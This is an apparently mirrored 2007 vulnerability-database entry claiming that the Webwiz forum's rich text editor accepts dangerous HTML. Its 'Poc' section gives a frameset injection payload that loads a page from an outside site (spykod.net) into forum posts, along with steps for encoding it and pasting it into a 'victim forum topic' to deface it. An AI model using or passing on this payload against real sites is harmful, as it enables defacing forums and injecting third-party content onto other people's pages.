Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17241
HistoryJun 12, 2007 - 12:00 a.m.

Webwiz vulnerable

2007-06-1200:00:00
vulners.com
28
JSON

Webwiz vulnerable

Versiyon: all versions are vulnerable

Poc:

it's vulnerable because of the rich text editor it accept codes which are dangerous

When you hex this code with charcode it accept it and you can deface the topic anywhere using webwiz

the code is this

<frameset cols=100% rows=100% border=0 frameborder=0 framespacing=0>
<frame frameborder=0 src=http://www.spykod.net/js/spy.html&gt;&lt;/frameset&gt;

hex it with charcode
then save it as html then make ctrl a ctrl c after it paste it to victim forum topic : )

[email protected]
www.spykod.net

JSON